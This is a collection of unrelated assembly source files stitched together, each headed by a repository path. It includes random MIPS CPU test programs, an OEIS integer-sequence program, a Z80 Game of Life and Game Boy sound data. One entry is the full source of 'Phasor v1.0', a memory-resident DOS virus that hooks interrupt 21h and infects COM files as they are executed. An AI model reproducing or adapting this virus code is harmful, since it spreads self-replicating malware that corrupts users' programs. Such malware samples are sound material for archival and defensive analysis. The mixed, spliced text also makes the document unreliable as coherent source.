srlv $4,$4,$3 lbu $4,15($0) sltiu $5,$3,-11831 lw $4,8($0) sltu $3,$3,$3 addu $3,$3,$3 sb $3,0($0) lw $5,12($0) lb $4,14($0) xori $5,$3,41513 nor $3,$6,$3 and $4,$5,$3 lb $3,9($0) addu $4,$4,$3 lh $5,6($0) addu $4,$1,$3 sw $4,8($0) addiu $1,$3,-29814 xor $0,$0,$3 subu $5,$4,$3 lbu $3,16($0) xor $3,$3,$3 sb $0,2($0) sh $1,2($0) addu $4,$4,$3 lh $6,14($0) xori $4,$4,15311 addiu $4,$3,-30806 lhu $3,10($0) and $3,$3,$3 andi $4,$0,43581 or $3,$4,$3 subu $3,$5,$3 subu $5,$4,$3 lh $3,12($0) slti $4,$4,10734 and $4,$4,$3 lh $4,16($0) sllv $3,$3,$3 or $3,$3,$3 slti $2,$2,-24283 addu $4,$6,$3 sll $5,$5,18 subu $3,$3,$3 slt $1,$5,$3 lw $4,16($0) srav $4,$1,$3 srlv $5,$1,$3 or $3,$4,$3 addiu $4,$4,22679 xori $4,$1,541 xori $3,$3,3035 lbu $1,9($0) sw $4,8($0) lbu $1,8($0) lbu $5,16($0) srlv $4,$4,$3 ori $4,$4,14183 lh $3,14($0) addiu $3,$5,31761 xor $4,$5,$3 sll $1,$1,22 sltu $3,$3,$3 addiu $3,$4,-19653 ori $3,$5,35370 subu $5,$4,$3 andi $3,$0,27240 lhu $4,10($0) xor $4,$4,$3 srlv $3,$6,$3 nor $5,$1,$3 slti $5,$5,28802 subu $3,$3,$3 sltiu $4,$0,10787 sll $3,$1,26 ori $0,$3,13064 xori $3,$3,50283 lbu $4,16($0) sltu $4,$1,$3 sw $1,0($0) xori $0,$0,57189 subu $6,$6,$3 slt $5,$3,$3 addu $6,$6,$3 sh $6,16($0) addu $5,$1,$3 subu $5,$5,$3 and $0,$4,$3 srl $3,$3,20 sllv $1,$1,$3 sllv $4,$4,$3 addu $3,$1,$3 sw $4,0($0) subu $5,$3,$3 lh $4,16($0) ori $5,$1,61496 xor $3,$3,$3 nor $3,$6,$3 nor $4,$4,$3 subu $6,$1,$3 subu $3,$2,$3 slti $3,$4,-15046 xori $4,$3,7521 lw $3,8($0) andi $4,$3,34761 xori $6,$3,59914 sllv $5,$6,$3 sltiu $5,$5,15739 xori $1,$1,39839 srl $5,$1,24 andi $4,$0,36448 sw $3,4($0) slti $3,$2,-25751 subu $6,$3,$3 subu $4,$5,$3 nor $3,$2,$3 srav $3,$3,$3 subu $4,$5,$3 lhu $3,8($0) addiu $3,$5,12331 ori $1,$1,62055 sllv $3,$1,$3 lb $3,6($0) ori $3,$3,49635 xori $0,$0,35734 ori $3,$2,40872 lhu $5,16($0) srav $5,$3,$3 srlv $3,$4,$3 sltu $1,$4,$3 ori $1,$3,8669 addiu $3,$4,24435 lbu $1,6($0) srlv $5,$2,$3 xori $6,$1,7735 sra $3,$3,8 addiu $3,$1,-1862 sll $4,$3,16 and $4,$5,$3 sllv $3,$6,$3 sra $0,$3,20 and $3,$3,$3 lhu $5,8($0) addiu $4,$4,12686 srav $3,$3,$3 nor $3,$3,$3 sll $3,$6,15 ori $1,$4,39575 subu $6,$2,$3 addiu $3,$1,-22725 or $4,$3,$3 lbu $1,9($0) subu $3,$3,$3 lh $0,14($0) sb $4,4($0) sltu $5,$0,$3 srav $5,$6,$3 subu $4,$4,$3 srl $1,$3,6 lb $4,1($0) slt $3,$2,$3 subu $3,$4,$3 lhu $4,16($0) nor $3,$3,$3 sb $1,5($0) sltiu $3,$4,11462 xor $6,$0,$3 srl $6,$2,14 sll $3,$4,8 ori $4,$4,26265 xor $3,$4,$3 sh $3,4($0) srav $5,$5,$3 or $3,$5,$3 ori $4,$4,61547 subu $5,$3,$3 andi $3,$0,46574 ori $4,$6,58751 ori $4,$1,3394 sltiu $3,$3,30241 xor $4,$2,$3 and $0,$3,$3 sb $4,4($0) sltiu $0,$5,-27624 addiu $3,$6,-32514 sw $1,8($0) xori $0,$0,39814 andi $5,$3,22112 xori $1,$4,36246 addu $5,$3,$3 sw $5,4($0) slti $1,$6,29483 addu $0,$0,$3 sltiu $5,$3,3008 sw $1,16($0) addu $4,$3,$3 lw $3,8($0) sra $5,$3,15 sltiu $3,$3,-30753 addu $4,$3,$3 lh $5,0($0) addu $1,$6,$3 srl $4,$4,15 xor $0,$0,$3 subu $3,$4,$3 lw $3,16($0) ori $5,$6,29751 sb $5,12($0) lbu $0,2($0) lb $3,4($0) nor $4,$3,$3 srlv $4,$3,$3 nor $3,$4,$3 sltu $0,$3,$3 sw $3,12($0) lw $1,16($0) sra $1,$3,5 slt $1,$3,$3 sltu $5,$2,$3 sra $5,$5,0 srav $4,$3,$3 sltiu $1,$1,-15047 lb $3,14($0) srav $6,$6,$3 srl $3,$0,16 nor $4,$4,$3 sltiu $3,$3,1810 addu $5,$3,$3 subu $1,$4,$3 slt $4,$4,$3 addiu $3,$4,-2794 and $0,$5,$3 addiu $4,$1,11476 sra $4,$1,2 xor $3,$1,$3 sb $0,14($0) sltiu $6,$4,22112 subu $6,$1,$3 sltu $1,$1,$3 lw $3,0($0) sb $0,16($0) ori $6,$1,54316 sltiu $5,$5,14206 sltiu $3,$4,-570 xori $3,$3,56081 srl $4,$5,11 slt $5,$5,$3 nor $4,$3,$3 nor $3,$3,$3 xor $3,$1,$3 andi $1,$0,60988 sw $6,4($0) addiu $3,$1,32291 or $4,$1,$3 srlv $4,$4,$3 slti $3,$5,6852 and $4,$2,$3 xor $4,$5,$3 srav $0,$0,$3 lw $3,16($0) nor $3,$5,$3 andi $5,$5,49388 andi $3,$3,38826 addiu $4,$3,6417 nor $1,$4,$3 lh $4,10($0) subu $3,$6,$3 sw $4,12($0) or $6,$6,$3 lbu $5,11($0) srav $3,$5,$3 lw $5,8($0) sh $4,14($0) nor $0,$1,$3 sw $4,16($0) lbu $0,0($0) xor $3,$1,$3 sltiu $3,$6,8871 lb $3,13($0) xor $3,$5,$3 andi $3,$3,36092 subu $6,$3,$3 xori $1,$3,24692 addiu $0,$6,18613 subu $3,$3,$3 sltiu $0,$0,-26558 sb $1,9($0) nor $5,$1,$3 slt $5,$5,$3 srlv $4,$5,$3 or $0,$5,$3 nor $0,$4,$3 slti $4,$3,32376 srl $4,$4,31 lbu $6,1($0) or $3,$0,$3 sllv $4,$3,$3 lbu $0,2($0) andi $1,$4,8944 sra $3,$3,28 srl $1,$0,19 sb $1,2($0) sltiu $5,$3,9068 nor $3,$6,$3 lb $3,5($0) and $5,$4,$3 ori $3,$3,43831 sltu $3,$5,$3 nor $3,$3,$3 addu $3,$4,$3 subu $5,$5,$3 subu $1,$3,$3 slti $4,$4,-6919 addu $4,$3,$3 lb $4,7($0) addiu $4,$3,-15031 andi $4,$4,50021 addu $6,$3,$3 srlv $0,$4,$3 addu $6,$3,$3 lb $3,0($0) ori $1,$4,62324 sltiu $3,$1,1123 and $4,$1,$3 sra $5,$6,17 lb $1,3($0) lh $5,14($0) sll $1,$5,25 sltu $3,$3,$3 subu $3,$0,$3 slti $4,$4,32510 srl $4,$1,23 andi $1,$6,46597 sra $3,$4,31 sll $5,$6,16 xor $4,$3,$3 subu $3,$4,$3 sltu $1,$3,$3 xori $3,$3,63968 addu $1,$3,$3 ori $6,$6,36061 srav $3,$3,$3 lw $3,16($0) sllv $1,$5,$3 slti $5,$1,-21729 and $4,$5,$3 or $3,$1,$3 lb $3,15($0) and $0,$5,$3 slti $3,$6,30152 addu $4,$5,$3 or $3,$3,$3 xori $5,$1,6306 subu $6,$3,$3 lw $4,12($0) lbu $3,9($0) sh $3,14($0) addu $6,$3,$3 slt $4,$4,$3 xori $4,$4,14 lw $6,0($0) sltu $3,$4,$3 andi $3,$6,48433 sllv $3,$6,$3 lhu $5,14($0) lh $4,6($0) addu $1,$1,$3 ori $3,$5,25745 addu $3,$5,$3 srav $3,$6,$3 addu $1,$4,$3 addu $3,$3,$3 addu $3,$4,$3 slti $4,$4,28936 addu $3,$4,$3 srl $3,$3,16 addu $1,$6,$3 andi $1,$1,51902 addu $3,$4,$3 and $0,$0,$3 addiu $5,$3,-19741 lb $6,15($0) subu $1,$3,$3 xori $3,$3,59552 ori $5,$6,42838 nor $3,$5,$3 ori $3,$5,8463 sltu $3,$6,$3 sltu $5,$4,$3 srl $4,$4,24 xor $5,$6,$3 srl $3,$4,19 srav $3,$3,$3 subu $3,$6,$3 lb $5,5($0) sh $3,4($0) srlv $4,$3,$3 sllv $3,$4,$3 lhu $3,4($0) sllv $3,$5,$3 lw $4,12($0) andi $6,$4,12059 sh $3,14($0) lw $1,0($0) srav $4,$4,$3 lhu $6,2($0) subu $6,$3,$3 lbu $3,2($0) sllv $5,$6,$3 lb $4,5($0) srav $4,$3,$3 and $4,$4,$3 xori $0,$4,44657 lh $1,16($0) sll $3,$3,3 lw $3,16($0) addiu $3,$4,584 lb $6,0($0) sltu $1,$5,$3 subu $3,$2,$3 andi $4,$4,22667 sll $4,$1,22 addu $3,$4,$3 ori $3,$3,60823 addiu $0,$3,-18498 addiu $6,$1,21911 lh $3,16($0) ori $4,$4,2283 lh $3,8($0) lhu $4,10($0) lh $3,14($0) subu $3,$3,$3 subu $3,$3,$3 subu $6,$6,$3 srl $3,$4,17 subu $6,$1,$3 addu $5,$2,$3 lb $5,14($0) or $1,$5,$3 sltu $3,$4,$3 or $5,$3,$3 srl $4,$4,28 subu $3,$1,$3 subu $5,$5,$3 xor $3,$4,$3 srav $6,$6,$3 slt $5,$1,$3 sra $3,$3,25 ori $3,$3,24515 sltu $6,$4,$3 sllv $1,$3,$3 sh $3,10($0) lh $1,4($0) ori $4,$3,6492 addu $3,$5,$3 subu $4,$4,$3 lw $5,0($0) xor $5,$3,$3 addiu $0,$4,4959 sh $4,16($0) sltu $5,$0,$3 addiu $4,$4,-7023 and $0,$0,$3 lbu $3,2($0) andi $0,$3,8063 lw $4,12($0) addu $5,$4,$3 xor $1,$1,$3 lw $6,4($0) lw $3,4($0) subu $3,$5,$3 slti $0,$3,-18770 sltiu $3,$3,31378 sltiu $6,$6,2850 lb $3,13($0) and $3,$5,$3 and $4,$3,$3 andi $1,$1,9874 srav $6,$3,$3 sltu $4,$3,$3 xor $3,$1,$3 or $3,$3,$3 addu $4,$6,$3 xori $1,$5,56604 nor $5,$1,$3 lw $3,8($0) lb $5,15($0) slti $5,$3,1395 xori $5,$3,40194 srlv $1,$6,$3 sltu $5,$5,$3 lbu $0,16($0) andi $5,$0,45947 lhu $1,10($0) srlv $3,$3,$3 slti $4,$4,-3959 subu $5,$5,$3 sh $0,8($0) andi $4,$4,18713 sltiu $3,$3,1715 and $3,$0,$3 sltu $3,$4,$3 addu $4,$3,$3 lw $5,12($0) addiu $0,$1,-8140 lh $6,6($0) slti $5,$4,-226 nor $6,$2,$3 sltiu $4,$3,-924 andi $4,$3,60863 subu $4,$3,$3 subu $2,$2,$3 nor $4,$4,$3 lhu $3,12($0) sltu $5,$1,$3 andi $3,$4,63435 sll $5,$4,6 sltu $1,$4,$3 nor $4,$4,$3 addiu $6,$4,-25072 or $3,$4,$3 sll $4,$1,28 addiu $4,$1,-22469 sw $1,4($0) lbu $6,14($0) sw $5,0($0) sb $5,6($0) xor $3,$3,$3 lw $5,0($0) sb $3,15($0) srav $1,$1,$3 sb $6,5($0) sll $3,$5,10 addu $1,$5,$3 slt $0,$0,$3 addu $3,$4,$3 lhu $4,10($0) sw $1,0($0) or $3,$6,$3 andi $4,$4,50620 andi $0,$6,45345 sllv $1,$6,$3 or $1,$0,$3 sra $4,$4,28 sll $3,$3,30 lw $4,16($0) sb $6,8($0) andi $3,$3,42621 addiu $4,$6,25674 lw $4,12($0) and $4,$3,$3 slt $4,$2,$3 subu $3,$5,$3 addu $3,$3,$3 srav $1,$4,$3 slti $5,$1,11823 slti $3,$3,18587 lw $0,8($0) addiu $4,$4,31688 srlv $4,$6,$3 lw $5,8($0) xori $4,$4,58381 lhu $0,6($0) nor $4,$4,$3 lhu $1,14($0) andi $5,$5,43530 lbu $1,14($0) addiu $3,$3,-1339 addu $5,$4,$3 and $4,$2,$3 xori $6,$1,15489 lhu $4,12($0) srl $3,$3,27 xori $3,$3,46829 srlv $1,$2,$3 sltu $4,$4,$3 slti $1,$6,-4097 lbu $4,2($0) sltiu $4,$4,13919 lb $0,5($0) xori $4,$0,16344 andi $1,$1,34176 sra $4,$3,20 xor $3,$0,$3 srav $5,$5,$3 sra $4,$1,14 sw $6,0($0) srav $1,$3,$3 lbu $5,10($0)
MSDOS/Virus.MSDOS.Unknown.phasor10.asm	fengjixuchui/Family	3	247172	; ; [Phasor] v1.0 ; Written by Memory Lapse of Phalcon/Skism ; ; This is a simple memory resident, COM infector. It hides in the unused ; portion of the interrupt table starting at 0:1E0h. ; ; To Assemble: ; TASM [PHASOR10]/m2 - TLINK [PHASOR10]/T ; .model tiny ; .code ; .286 ; org 100h ; ; start: ;Mark Start of Code v_start: ;Mark Start of Virus mov bp,0000h ;Self Modifying Delta delta equ $-002h ; Offset. ; xor di,di ;Load Register w/Zero mov es,di ;ES = 000h ; mov di,01E0h ;DI = 1E0h ; cmp byte ptr es:[di],0BDh ;Virus Present? jz restoreCOMbytes ;(0BDh = MOV BP,XXXX) ; push cs ;Save CS onto Stack pop ds ;Restore DS (CS=DS) ; mov cx,(heap_end-v_start)/002h ;CX = # of Words To Copy lea si,[bp+100h] ;SI = Start of Virus rep movsw ;Copy Virus To Int Table ; mov ax,offset i021h+0E0h ;AX = Handler + Offset ; xchg ax,word ptr es:[084h] ;Modify Interrupt Table mov word ptr es:[i021hOffset+0E0h],ax ; To Point To Virus's ; Interrupt 021h mov ax,es ; Handler. ; xchg ax,word ptr es:[086h] ; mov word ptr es:[i021hSegment+0E0h],ax ; ; restoreCOMbytes: ; push cs cs ;Equal Out Segment pop ds es ; Registers. ; lea si,[bp+host_bytes] ;SI = Host's Bytes mov di,100h ;DI = Start of Host push di ;Save DI onto Stack mov byte ptr [di],0C3h ;Write RET to Host call di ;Call 100h (RET) ; movsb ;Byte @ DS:[SI]=>ES:[DI] movsw ;Word @ DS:[SI]=>ES:[DI] ; retn ;Return to Host Program. ; host_bytes db 0CDh,020h,000h ;Buffer For Starting of ; Host Program. infect: xor bp,bp ;Load Register w/Zero ; mov ax,3D00h ;AX = 3D00h int 021h ;Open File in R/O Mode. ; xchg ax,bx ; ; push bx cs cs ;Save Handle, Equal Out pop ds es ; Segment Registers. ; mov ax,1220h ;AX = 1220h int 02Fh ;Get JFT. ; mov ax,1216h ;AX = 1216h mov bl,byte ptr es:[di] ;BL = Location of SFT int 02Fh ;Get SFT. ; pop bx ;Restore File Handle ; mov word ptr es:[di+002h],002h ;Open File For Read And ; Write Mode. mov ah,03Fh ;AH = 3Fh mov cx,003h ;CX = # of Bytes To Read mov dx,offset host_bytes+0E0h ;DX = Buffer + Offset int 021h ;Read 003h Bytes To Bufr ; mov si,dx ;SI = DX ; cmp word ptr [si+000h],5A4Dh ;EXE File? jz closeCOMfile ;Exit Virus ; cmp word ptr [si+000h],4D5Ah ;EXE File? jz closeCOMfile ;Exit Virus ; push cx ;Save CX onto Stack. ; mov ax,4202h ;AX = 4202h xor cx,cx ;Load Register w/Zero cwd ;Load Register w/Zero int 021h ;Move File Pointer @ EOF ; pop cx ;Restore CX. ; mov word ptr [delta+0E0h],ax ;Write Delta Offset ; sub ax,cx ;Subtract 3h from Size. mov byte ptr [temp_buffer+0E0h+000h],0E9h ;Write Jump to Buffer mov word ptr [temp_buffer+0E0h+001h],ax ;Write Location to Buffr ; sub ax,(v_end-v_start) ;Subtract Virus Length ; cmp word ptr [si+001h],ax ;Is File Infected? jz closeCOMfile ;Jump if Infected. ; mov ah,040h ;AH = 40h mov cx,(v_end-v_start) ;CX = # of Bytes to Wrte mov dx,01E0h ;DX = Data to Write int 021h ;Write To File. ; mov word ptr es:[di+015h],bp ;Move File Pointer To mov word ptr es:[di+017h],bp ;Start of File. ; mov ah,040h ;AH = 40h mov cx,003h ;CX = # of Bytes to Wrte mov dx,offset temp_buffer+0E0h ;DX = Data to Write int 021h ;Write To File. ; mov ax,5701h ;AX = 5701h mov cx,word ptr es:[di+00Dh] ;CX = Time Stamp mov dx,word ptr es:[di+00Fh] ;DX = Date Stamp int 021h ;Set Time. ; closeCOMfile: ; mov ah,03Eh ;AH = 3Eh int 021h ;Close File. ; jmp exit ;Unconditional Jump ; db "[ML/PS]" ; ; i021h: pusha ;Preserve All Regs. push ds es ;Save Segment Registers. ; sub ax,4B00h ;Executing A File? jnz exit ;Jump If Not 4B00h. ; jmp infect ;Unconditional Jump. exit: pop es ds ;Restore Segment Regs. popa ;Restore All Registers. ; int21h: db 0EAh ;JMP SSSS:OOOOO ; v_end: ;End of Virus heap_start: ;Start of Heap ; i021hOffset dw 001h dup (?) ;Buffer for Offset i021hSegment dw 001h dup (?) ;Buffer for Segment temp_buffer db 003h dup (?) ;Buffer for Calculations ; heap_end: ;End of Heap ; end start ;End of Source
oeis/051/A051536.asm	neoneye/loda-programs	11	15501	; A051536: a(n) = least common multiple of {1, 4, 7, 10, 13 ..., 3n+1} (A016777). ; Submitted by <NAME> ; 1,4,28,140,1820,7280,138320,1521520,7607600,7607600,235835600,4009205200,148340592400,148340592400,6378645473200,146708845883600,1026961921185200,1026961921185200,1026961921185200,29781895714370800,1816695638576618800,7266782554306475200,486874431138533838400,486874431138533838400,35541833473112970203200,35541833473112970203200,2807804844375924646052800,115119998619412910488164800,115119998619412910488164800,115119998619412910488164800,115119998619412910488164800,5410639935112406792943745600 mov $1,1 mov $2,1 lpb $0 mov $3,$2 add $2,2 lpb $3 add $2,1 mov $4,$1 gcd $4,$2 div $1,$4 mov $3,$5 lpe sub $0,1 mul $1,$2 lpe mov $0,$1
life.asm	ncot-tech/z80-life	9	86676	OUTPUT life.z80 ORG $8000 ; Defines ScreenWidth EQU 80 ScreenHeight EQU 25 ScreenSize EQU ScreenWidth*ScreenHeight DeadChar EQU $20 AliveChar EQU $40 call printBoard main: call calcCells call swapScreen call printBoard ;call printBoardNeighbourCount ; loop jp main ret printBoard: call cls ld de,boardTop call printStr call printNl ld a,'\|' call printChr ld de,0 ld b,0 printLoop: ld hl,(currentGrid) add hl,de ld a,(hl) cp 1 jp nz, printDeadCell ld a,AliveChar call printChr jp printCharDone printDeadCell: ld a,DeadChar call printChr printCharDone: inc de inc b ld hl,ScreenSize ; this is a constant or a sbc hl,de add hl,de jp z,printLoopDone ld a,ScreenWidth cp b jp nz,printLoop ld a,'\|' call printChr call printNl ld a,'\|' call printChr ld b,0 jp printLoop printLoopDone: ld a,'\|' call printChr call printNl ld de,boardBottom call printStr ret ; This works, stop debugging it swapScreen: ld hl,(currentGrid) ld de,(otherGrid) ld (otherGrid),hl ld (currentGrid),de ret include debugging.asm include board2.asm include utils.asm include ansi.asm include data.asm end:
audio/sfx/cry21_1.asm	adhi-thirumala/EvoYellow	16	94573	SFX_Cry21_1_Ch1: dutycycle 27 unknownsfx0x20 3, 243, 100, 5 unknownsfx0x20 2, 226, 68, 5 unknownsfx0x20 5, 209, 34, 5 unknownsfx0x20 2, 178, 132, 4 unknownsfx0x20 8, 209, 162, 4 unknownsfx0x20 3, 243, 36, 5 unknownsfx0x20 4, 228, 228, 4 unknownsfx0x20 8, 209, 2, 5 endchannel SFX_Cry21_1_Ch2: dutycycle 204 unknownsfx0x20 3, 211, 96, 5 unknownsfx0x20 2, 194, 64, 5 unknownsfx0x20 5, 193, 32, 5 unknownsfx0x20 2, 146, 128, 4 unknownsfx0x20 8, 193, 160, 4 unknownsfx0x20 3, 211, 32, 5 unknownsfx0x20 3, 196, 224, 4 unknownsfx0x20 8, 193, 0, 5 SFX_Cry21_1_Ch3: endchannel
P6/P6Judger - 100 testpoints/testpoint/testpoint27.asm	flyinglandlord/BUAA-CO-2021	5	1151	ori $1, $0, 6 ori $2, $0, 8 ori $3, $0, 6 ori $4, $0, 9 sw $2, 0($0) sw $4, 4($0) sw $4, 8($0) sw $3, 12($0) sw $3, 16($0) sw $4, 20($0) sw $2, 24($0) sw $4, 28($0) sw $2, 32($0) sw $3, 36($0) sw $3, 40($0) sw $2, 44($0) sw $3, 48($0) sw $3, 52($0) sw $4, 56($0) sw $3, 60($0) sw $2, 64($0) sw $1, 68($0) sw $2, 72($0) sw $2, 76($0) sw $3, 80($0) sw $3, 84($0) sw $3, 88($0) sw $4, 92($0) sw $1, 96($0) sw $2, 100($0) sw $3, 104($0) sw $1, 108($0) sw $4, 112($0) sw $2, 116($0) sw $4, 120($0) sw $4, 124($0) beq $2, $2, TAG1 sh $2, 0($2) bgtz $2, TAG1 mtlo $2 TAG1: lw $1, 0($2) beq $2, $1, TAG2 mfhi $1 bne $1, $2, TAG2 TAG2: add $2, $1, $1 lb $1, 0($2) xori $4, $2, 7 sltiu $1, $1, 8 TAG3: srl $1, $1, 13 mthi $1 lhu $1, 0($1) sltiu $3, $1, 1 TAG4: bgez $3, TAG5 mfhi $3 mtlo $3 sw $3, 0($3) TAG5: bne $3, $3, TAG6 mflo $1 lhu $1, 0($3) lui $1, 8 TAG6: multu $1, $1 sll $0, $0, 0 sll $0, $0, 0 lui $1, 10 TAG7: bne $1, $1, TAG8 sll $0, $0, 0 sll $0, $0, 0 lui $4, 9 TAG8: sll $0, $0, 0 multu $4, $4 sll $0, $0, 0 beq $4, $4, TAG9 TAG9: mflo $3 bltz $4, TAG10 xor $2, $3, $4 mflo $4 TAG10: bgtz $4, TAG11 lw $1, 0($4) mflo $3 mflo $2 TAG11: lui $3, 1 slt $1, $3, $3 mult $2, $1 mtlo $2 TAG12: mflo $4 sw $4, 0($1) srlv $3, $4, $1 mthi $3 TAG13: lh $1, 0($3) beq $3, $3, TAG14 sw $1, 0($3) mflo $2 TAG14: lui $1, 4 sltiu $2, $1, 4 lbu $2, 0($2) lui $3, 15 TAG15: mflo $3 sll $4, $3, 11 sb $3, 0($4) lb $4, 0($3) TAG16: addu $2, $4, $4 lui $1, 15 bgtz $2, TAG17 lui $4, 7 TAG17: mflo $3 bltz $4, TAG18 lui $3, 12 sll $0, $0, 0 TAG18: beq $3, $3, TAG19 lui $2, 15 multu $3, $3 sh $3, 0($2) TAG19: addu $1, $2, $2 mfhi $2 multu $2, $1 sh $1, 0($2) TAG20: lh $4, 0($2) multu $2, $4 beq $2, $4, TAG21 lbu $3, 0($2) TAG21: lui $1, 12 mflo $2 mfhi $1 blez $2, TAG22 TAG22: mflo $3 mflo $3 srav $1, $3, $3 mflo $3 TAG23: lw $3, 0($3) bgez $3, TAG24 mtlo $3 sltu $1, $3, $3 TAG24: beq $1, $1, TAG25 mult $1, $1 sltiu $3, $1, 8 addiu $3, $3, 10 TAG25: lbu $4, 0($3) addi $1, $3, 2 beq $1, $1, TAG26 srav $2, $3, $4 TAG26: sw $2, 0($2) mflo $3 multu $3, $2 slti $4, $3, 2 TAG27: mtlo $4 beq $4, $4, TAG28 mult $4, $4 bgez $4, TAG28 TAG28: lb $1, 0($4) sb $1, 0($4) sb $1, 0($4) beq $1, $1, TAG29 TAG29: sw $1, 0($1) bltz $1, TAG30 srav $3, $1, $1 andi $4, $3, 12 TAG30: lh $4, 0($4) multu $4, $4 mult $4, $4 sw $4, 0($4) TAG31: add $1, $4, $4 srlv $4, $1, $4 sh $4, 0($4) mult $4, $4 TAG32: beq $4, $4, TAG33 sh $4, 0($4) multu $4, $4 mult $4, $4 TAG33: mfhi $1 mthi $1 lui $1, 5 blez $4, TAG34 TAG34: div $1, $1 lui $3, 2 mfhi $3 multu $3, $3 TAG35: beq $3, $3, TAG36 lw $4, 0($3) mtlo $4 bne $4, $3, TAG36 TAG36: sra $3, $4, 1 lui $4, 15 mtlo $4 beq $4, $4, TAG37 TAG37: sra $1, $4, 1 addu $3, $1, $4 mfhi $4 sw $4, 0($4) TAG38: blez $4, TAG39 sll $1, $4, 14 lh $3, 0($4) mtlo $3 TAG39: sll $2, $3, 2 bne $3, $3, TAG40 multu $3, $2 sll $0, $0, 0 TAG40: mtlo $2 sll $0, $0, 0 subu $1, $2, $2 mflo $1 TAG41: sll $0, $0, 0 lui $1, 15 sll $0, $0, 0 or $4, $1, $1 TAG42: addu $4, $4, $4 div $4, $4 bgez $4, TAG43 sll $0, $0, 0 TAG43: bltz $4, TAG44 mtlo $4 lui $4, 15 mtlo $4 TAG44: addiu $4, $4, 14 sll $0, $0, 0 addu $2, $4, $4 beq $2, $4, TAG45 TAG45: xori $3, $2, 3 sll $0, $0, 0 mtlo $2 mflo $2 TAG46: sll $0, $0, 0 lui $2, 0 bltz $3, TAG47 sw $3, 0($2) TAG47: mflo $3 lui $3, 7 lui $4, 0 sll $0, $0, 0 TAG48: blez $4, TAG49 mult $4, $4 mthi $4 beq $4, $4, TAG49 TAG49: lui $3, 0 lui $2, 14 multu $4, $4 srlv $1, $2, $2 TAG50: subu $4, $1, $1 bne $4, $4, TAG51 xori $1, $4, 9 sltiu $3, $4, 7 TAG51: lbu $3, 0($3) multu $3, $3 blez $3, TAG52 mflo $1 TAG52: sw $1, 0($1) mthi $1 mflo $3 sra $4, $1, 3 TAG53: multu $4, $4 mult $4, $4 mthi $4 bne $4, $4, TAG54 TAG54: mtlo $4 lui $3, 11 sll $0, $0, 0 mflo $2 TAG55: mult $2, $2 blez $2, TAG56 andi $2, $2, 11 mfhi $4 TAG56: blez $4, TAG57 lui $3, 0 mthi $4 bne $4, $3, TAG57 TAG57: mfhi $3 lbu $2, 0($3) lui $1, 6 bne $2, $1, TAG58 TAG58: sll $0, $0, 0 lh $2, 0($2) addiu $1, $2, 12 mult $2, $2 TAG59: subu $4, $1, $1 addi $4, $4, 10 srav $4, $4, $4 sw $4, 0($4) TAG60: bgtz $4, TAG61 srav $3, $4, $4 bne $3, $3, TAG61 lui $1, 2 TAG61: mflo $1 bgtz $1, TAG62 mult $1, $1 multu $1, $1 TAG62: lui $1, 10 addiu $2, $1, 8 sll $0, $0, 0 sll $0, $0, 0 TAG63: bltz $2, TAG64 sllv $3, $2, $2 sll $0, $0, 0 sll $0, $0, 0 TAG64: beq $2, $2, TAG65 mtlo $2 mflo $4 sh $2, 0($2) TAG65: xor $1, $4, $4 lui $2, 7 sll $0, $0, 0 srl $1, $4, 14 TAG66: sh $1, 0($1) mult $1, $1 lui $1, 15 div $1, $1 TAG67: mflo $1 mflo $2 mfhi $2 mfhi $2 TAG68: bne $2, $2, TAG69 mtlo $2 mflo $2 beq $2, $2, TAG69 TAG69: andi $1, $2, 13 mthi $2 lui $4, 4 bgez $2, TAG70 TAG70: lui $1, 15 slt $4, $1, $1 xor $2, $4, $4 sll $0, $0, 0 TAG71: multu $2, $2 beq $2, $2, TAG72 lui $2, 10 sltu $3, $2, $2 TAG72: bgtz $3, TAG73 xor $3, $3, $3 lbu $1, 0($3) bgez $1, TAG73 TAG73: divu $1, $1 bne $1, $1, TAG74 mtlo $1 bne $1, $1, TAG74 TAG74: mflo $2 addu $1, $2, $2 slt $1, $2, $1 lui $3, 13 TAG75: mthi $3 div $3, $3 addu $4, $3, $3 lui $3, 2 TAG76: sll $0, $0, 0 divu $3, $3 lui $3, 0 blez $3, TAG77 TAG77: lb $3, 0($3) beq $3, $3, TAG78 sra $2, $3, 7 sb $2, 0($2) TAG78: sh $2, 0($2) lui $2, 9 sll $0, $0, 0 sll $0, $0, 0 TAG79: div $2, $2 mfhi $3 beq $3, $2, TAG80 sb $3, 0($3) TAG80: blez $3, TAG81 mflo $1 multu $3, $1 mult $3, $1 TAG81: div $1, $1 lui $2, 15 addu $3, $1, $1 bltz $2, TAG82 TAG82: sra $4, $3, 10 bltz $3, TAG83 sll $3, $3, 12 srav $2, $3, $3 TAG83: mtlo $2 addiu $3, $2, 6 mflo $2 andi $4, $3, 2 TAG84: mflo $4 mtlo $4 lui $3, 10 bne $4, $4, TAG85 TAG85: sll $0, $0, 0 mult $3, $3 nor $2, $3, $3 sll $0, $0, 0 TAG86: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 TAG87: addu $2, $2, $2 lui $1, 13 sll $0, $0, 0 sll $0, $0, 0 TAG88: sll $0, $0, 0 sll $0, $0, 0 sltiu $2, $1, 14 xori $2, $1, 2 TAG89: sll $0, $0, 0 sll $0, $0, 0 sll $0, $0, 0 beq $2, $2, TAG90 TAG90: sll $0, $0, 0 mflo $4 bne $2, $4, TAG91 sll $0, $0, 0 TAG91: bgtz $4, TAG92 multu $4, $4 blez $4, TAG92 and $3, $4, $4 TAG92: lb $1, 0($3) lui $4, 13 mfhi $1 lui $4, 8 TAG93: div $4, $4 sll $0, $0, 0 bne $4, $4, TAG94 mflo $1 TAG94: divu $1, $1 sb $1, 0($1) beq $1, $1, TAG95 lb $1, 0($1) TAG95: bltz $1, TAG96 sb $1, 0($1) lbu $4, 0($1) bne $4, $1, TAG96 TAG96: lui $3, 14 beq $4, $4, TAG97 lui $4, 3 sllv $1, $4, $4 TAG97: lbu $1, 0($1) lb $1, 0($1) mthi $1 subu $4, $1, $1 TAG98: lui $1, 9 lhu $1, 0($4) mfhi $3 lw $2, 0($4) TAG99: beq $2, $2, TAG100 divu $2, $2 lui $4, 0 slt $2, $2, $2 TAG100: mthi $2 slti $4, $2, 6 sw $2, 0($4) beq $2, $4, TAG101 TAG101: xori $2, $4, 13 multu $2, $4 multu $2, $4 lh $4, 0($4) TAG102: bne $4, $4, TAG103 lui $3, 4 sll $0, $0, 0 sb $3, -256($4) TAG103: multu $3, $3 subu $4, $3, $3 divu $4, $3 sb $4, 0($4) TAG104: addiu $2, $4, 9 lbu $2, 0($4) slti $1, $2, 8 div $2, $1 TAG105: lui $1, 3 addu $1, $1, $1 nor $1, $1, $1 sltiu $2, $1, 13 